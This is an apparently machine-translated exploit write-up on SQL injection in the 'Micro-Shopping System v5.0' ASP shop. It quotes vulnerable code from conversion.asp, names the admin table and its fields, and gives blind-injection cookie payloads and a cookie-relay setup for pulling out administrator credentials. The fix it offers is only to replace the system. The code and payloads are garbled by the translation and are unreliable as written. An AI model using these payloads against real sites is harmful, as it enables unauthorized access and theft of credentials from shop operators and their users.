Micro-Shopping System v5.0 injection vulnerability analysis and repair

 
The following is the code for the conversion. asp page, and there are many other pages with the same situation.

<! -- # Include file = "conn. asp" --> <! -- # Include file = "webconfig. asp "--> <% if request. cookies ("cnhww") ("username") = "" then response. redirect "user. asp "response. end end if set cnhw = server. createObject ("adodb. recordset ") cnhw. open "select * from [wq_user] where username =" & request. cookies ("cnhww") ("username") & "", conn, 1, 3 jf = cnhw ("jifen") yc = cnhw ("yucun ") action = request ("act") if action = "jifen" then jifen = trim (request ("jifen") if not I SInteger (jifen) then response. write "<script> alert (" "illegal conversion result! ""); History. go (-1); </script> "else if jf-jifen <0 then response. write "<script> alert (" "Sorry, insufficient points! ""); History. go (-1); </script> "else cnhw (" jifen ") = jf-jifen cnhw (" yucun ") = yc + (jifen/2) cnhw. update response. redirect "user. asp "end if action =" cunkuan "then cunkuan = trim (request (" cunkuan ") if not isInteger (cunkuan) then response. write "<script language = javascript> alert (" "illegal conversion result! ""); History. go (-1); </script> "else if yc-cunkuan <0 then response. write "<script language = javascript> alert (" "Sorry, your deposit is insufficient! ""); History. go (-1); </script> "else cnhw (" jifen ") = jf + (cunkuan * 2) cnhw (" yucun ") = yc-cunkuan cnhw. update response. redirect "user. asp "end if %>
The username in the Code is the registered user name. If it is not filtered, It is substituted into the query. The Administrator table is wq_admin, the User Name field is admin, And the password field is password.
Method of exploits: first register a user, such as joker. Injection Method: Take the guess Administrator Account as an example:
Javascript: alert (document. cookie = "cnhww = username =" + escape ("Joker and (select top 1 asc (mid (admin, 1, 1) from wq_admin) = 97 and 1 = 1 ")) // The first

Javascript: alert (document. cookie = "cnhww = username =" + escape ("Joker and (select top 1 asc (mid (admin, 100) from wq_admin) = and 1 = 1 ")) // second d
.....
Finally, I got an account, and the password was a little troublesome. It was 16-bit MD5 encryption ,,

The injection here is very troublesome. I didn't expect other methods. Alas, this is the sorrow of cainiao. It would be nice if anyone could write a tool.
Another method has been proposed here. Isn't the lonely hedgehog writing intermediate code or submitting Cookies? fill in the relevant information:
JmStr = "cnhww = username =" & JmdcwName
JMUrl = "http: // 127.0.0.1/ewshop/conversion. asp"
JmRef = "http: // 127.0.0.1/ewshop/conversion. asp"
JmCok = "ASPSESSIONIDAQACTAQB = HKFHJOPDOMAIKGMPGBJJDKLJ ;"
JmCok = JmCok & ";" & Jmstr &";"
JmCok = URLEncoding (JmCok)
JmStr = "jmdcw = Joker"
......
After construction, access http: // 127.0.0.1/jmcook. asp? Jmdcw = joker is normal,
Access http: // 127.0.0.1/jmcook. asp? Jmdcw = joker and 1 = 1 normal,
Access http: // 127.0.0.1/jmcook. asp? Jmdcw = joker and 1 = 2 abnormal,
Bytes --------------------------------------------------------------------------------------------

I read the source code again and found that the system is full of vulnerabilities ,,
The shangpingtj. asp page can be directly injected.

 

Solution:

You don't have to fix it. Change the system directly.